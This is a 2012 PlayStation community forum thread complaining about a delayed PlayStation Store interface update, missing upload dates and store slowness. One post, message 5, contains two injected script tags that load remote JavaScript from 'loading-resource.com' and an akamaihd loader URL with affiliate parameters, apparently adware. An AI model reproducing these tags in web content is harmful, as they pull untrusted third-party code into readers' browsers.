Showing results for 
Search instead for 
Do you mean 
Oct 26 2012
By: RunzWithScissorz Lombax Warrior 94 posts

Playstation Store STILL SUCKS!

8 replies 459 views Edited Oct 26, 2012

I have mentioned this in the past, and after hearing of the Playstation Store update a week or two ago, I was anxious to see the update.

See an update? Yeah, well... there was nothing to see... it looks and functions exactly the same! It just has a few additional PROBLEMS now.

I could go on about how the game descriptions are lacking of information, screen shots are rare, and the ability to ask questions or provide feedback is non-existant.

But the one thing that STILL REALLY angers me, is they cannot provide a simple thing such as an upload date! Seriously people, how difficult is this???

Please use plain text.
Message 1 of 9 (459 Views)
0 Likes
Uncharted Territory
1283 posts

Re: Playstation Store STILL SUCKS!

Oct 26, 2012
I'm going to assume that you're in the U.S. You do know that we haven't recieved any store update, right? If you pay attention to the blog, you'd know they postponed the update because users in others countries were having some issues. I don't know what the next set release date is, it should be soon though.
Please use plain text.
Message 2 of 9 (455 Views)
Splicer
67 posts

Oct 27, 2012

When do us usa ps3 owner get update for playstation store?

Sony Gamers Rules
Please use plain text.
Message 3 of 9 (430 Views)
0 Likes
PlayStation MVP
18646 posts

[ Edited ]
Oct 27, 2012

SONY announced they were not going to be updating the PSN Store do to bugs on the new UI.http://blog.us.playstation.com/2012/10/19/update-on-the-new-playstation-store/

I made a thread which I titled: "PSN Store New UI Now Has Same Release Date As The Last Guardian"

http://community.us.playstation.com/t5/PlayStation-Network/PSN-Store-New-UI-Now-Has-Same-Release-Dat...

I was really hoping to see the new UI before the next store update cycle 10/30/12

---

Xuchilbara keeps brewing  substances and casting spells

7FXb|Thunderstorm Summer[Twitter] @SevenFactors Welcoming Committee 2.0 MVP
Please use plain text.
Message 4 of 9 (395 Views)
0 Likes
Wastelander
766 posts

Oct 27, 2012

i only spend money on dlc

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
trophy huting currently

Please use plain text.
Message 5 of 9 (385 Views)
0 Likes
Lombax Warrior
94 posts

Oct 29, 2012

Well, then please excuse my ignorance.

I was told by Playstation reps, that the reason I couldn't download episode 2 of The Walking Dead, was because of the "update".

And when seeing that the Playstation Store had not changed, I just figured it was a **bleep** update, with no real changes.

I still want to see Release Dates posted.

Please use plain text.
Message 6 of 9 (332 Views)
0 Likes
PlayStation MVP
5017 posts

Oct 29, 2012
Im sure they're still working on ironing things out for the NA release.

Please use plain text.
Message 7 of 9 (326 Views)
0 Likes
PlayStation MVP
18646 posts

Oct 30, 2012

RunzWithScissorz wrote:

Well, then please excuse my ignorance.

I was told by Playstation reps, that the reason I couldn't download episode 2 of The Walking Dead, was because of the "update".

And when seeing that the Playstation Store had not changed, I just figured it was a **bleep** update, with no real changes.

I still want to see Release Dates posted.

Yup and it might as well just be. The PSN server went an extended maintenance windows followed by the store content update.

On my previous post, just as you are on the original post, I'm talking about the store User Interface [the storefront] update, which was supposed to happen on the 23rd, was postponed due to bugs. As stated on a post at the official SEN blog, "there have been some issues that caused inconvenience for our users" The new UI was never deployed to end-user in the Americas. Perhaps the SysAdmins cough the problem and tried to fix the issue [this would explain why the store maintenance went overtime]

I was hoping to see an official announcement and release date during last week. Perhaps we get the new UI tomorrow. :smileyindifferent:

|Maybe I am right and the new store UI now has the same release date as The Last Guardian :smileyfrustrated:

http://community.us.playstation.com/t5/PlayStation-Network/PSN-Store-New-UI-Now-Has-Same-Release-Dat...

7FXb|Thunderstorm Summer[Twitter] @SevenFactors Welcoming Committee 2.0 MVP
Please use plain text.
Message 8 of 9 (317 Views)
0 Likes
Lombax Warrior
264 posts

Oct 30, 2012

The new store, while awesome and easy to navigate is still painfully slow, like really slow. It takes me on average 40-60 seconds for anything to pop up once I click on the store and from there it's more slowness. I hope the NA store is faster, and that the slowness isattributed to using a euro account.

Please use plain text.
Message 9 of 9 (284 Views)
0 Likes